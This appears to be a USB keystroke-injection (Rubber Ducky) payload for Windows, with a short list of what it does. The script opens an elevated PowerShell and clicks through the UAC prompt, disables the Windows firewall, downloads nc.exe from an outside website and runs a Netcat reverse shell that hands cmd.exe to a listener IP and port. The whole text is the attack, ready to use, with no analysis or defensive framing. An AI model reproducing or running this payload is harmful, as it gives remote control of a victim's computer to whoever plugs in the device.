This script will:
- Disable the Microsoft Windows Firewall
- Download Netcat
- Run Netcat mode reverse shell (nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
DELAY 750 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2050 ALT s DELAY 2050 ENTER STRING netsh firewall set opmode disable ENTER DELAY 100 STRING powershell Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2015/02/nc.exe' -Destination $env:TEMP\nc.exe; ENTER DELAY 100 GUI r DELAY 2050 STRING powershell cd $env:TEMP; .\nc.exe 192.168.1.36 999 -e cmd.exe -d ENTER |